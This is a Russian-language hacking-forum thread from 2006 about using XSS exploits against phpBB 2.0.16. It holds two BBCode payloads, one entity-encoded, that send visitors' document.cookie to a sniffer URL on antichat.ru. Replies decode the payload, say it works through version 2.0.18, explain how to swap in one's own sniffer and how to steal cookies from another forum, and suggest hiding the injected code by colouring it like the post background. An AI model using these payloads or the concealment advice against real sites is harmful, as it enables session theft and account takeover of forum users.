ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Exploit в phpbb 2.0.16
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Exploit в phpbb 2.0.16
  #1  
Старый 01.12.2006, 02:33
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию Exploit в phpbb 2.0.16
Код:
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
и вот

Код:
[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Стоит phpbb 2.0.16 а вопрос заключается в следующем... как Exploit подготовить к работе??
Ну насчёт первого мне интересна а где тама адрес снифера прописывать,а по поводу 2 я его испробывал но почему та куки не пришли(на себе испытавал )
 
Ответить с цитированием

  #2  
Старый 01.12.2006, 02:36
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию
Это XSS. в первом адрес снифера:
#58;&+#117;&+#114;&+#108;&+#40;&+
#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+
#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+
#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+
#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+
#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+
#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+
#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+
#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+
#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+
#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+
#103;&+#63;&+#34;+document.cookie

А ты звездочки убирал?
 
Ответить с цитированием

  #3  
Старый 01.12.2006, 02:42
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию
Во втором?- да убирал

Цитата:
Сообщение от kyzmi4  
Это XSS. в первом адрес снифера:
#58;&+#117;&+#114;&+#108;&+#40;&+
#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+
#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+
#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+
#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+
#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+
#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+
#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+
#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+
#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+
#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+
#103;&+#63;&+#34;+document.cookie
Что то я не совсем понял и где этот снифер находится ... Заранее извиняюсь за глупые вопросы(может быть)
Последний раз редактировалось {BuT@Min}; 01.12.2006 в 02:44..
 
Ответить с цитированием

  #4  
Старый 01.12.2006, 07:55
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию
закодировано тут вот, что :url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie можешь воспользоваться декодером тут _http://webmastertools.narod.ru/OnlineTools/unicode_decode.html
Последний раз редактировалось злюка; 01.12.2006 в 07:58..
 
Ответить с цитированием

  #5  
Старый 01.12.2006, 11:09
Аватар для MegaBits
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию
А вместо этого http://wj.com/ должен быть написан адрес форума с которого хочу стащить куки? И еще эти XSS на phpBB 2.0.13 прокатят?
 
Ответить с цитированием

  #6  
Старый 01.12.2006, 11:37
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию
Цитата:
Сообщение от MegaBits  
А вместо этого http://wj.com/ должен быть написан адрес форума с которого хочу стащить куки? И еще эти XSS на phpBB 2.0.13 прокатят?
ничего в этой XSS менять кроме адреса снифера не нужно...просто постишь на форуме и ловишь куки, помоему эта XSS катит до версии 2.0.18 (включая).
 
Ответить с цитированием

  #7  
Старый 01.12.2006, 21:13
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию
Подписался на расылку снифера и нифига он что не шлёт --
Вы имеете возможность получать на ваш e-mail логи сниффера в режиме реального времени. Отсылка лога в почтовый ящик происходит сразу, как только сниффер примет информацию.

филтр на рефер указал в чём проблема?? (проверял заходил по хсс сам) как можна свой сниффер зделать????
Последний раз редактировалось {BuT@Min}; 01.12.2006 в 22:09..
 
Ответить с цитированием

  #8  
Старый 02.12.2006, 00:17
Аватар для MegaBits
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию
Может страничку с Xss которую ты создал еще никто не просмотрел и поэтому куки не пришли?
 
Ответить с цитированием

  #9  
Старый 06.12.2006, 19:00
Аватар для Lorix
Lorix
Новичок
Регистрация: 05.12.2006
Сообщений: 16
Провел на форуме:
24503

Репутация: 1
По умолчанию
Здраствуйте. У меня есть к вам 2 вопроса
1, Где можно скачать файлик и установить у тебя на хсоте чтобы он туда тянул кукисы
2, Если поставить данный код в сообщение в топике то он вить будет отображся так сказать открытым. Тоесть как текст.
И также будут видны надписи куки и урл.
Как быть подскажите. Или я чтото не то делаю ?

аська 491104
 
Ответить с цитированием

  #10  
Старый 06.12.2006, 20:32
Аватар для Abra
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию
1. Ищи на форуме по запросу "сниффер". Их тут много должно быть
2. Перед и после кода XSS поставь тэги цвета фона форума. (точнее фона поста.)
[c*olor=#RRGGBB]Здесь твоя ХССка[/c*olor]
где RRGGBB - цвет в формате Red Green Blue.
Твоя ХССка так и так будет открыта, но будет не видна в посте, и вряд ли ее заметят.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
phpBB 2.0.19 Exploit m0nzt3r Форумы 41 29.06.2006 16:05
phpBB admin =>2.0.19 exec exploit 0verfe1 Форумы 29 14.06.2006 00:35
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ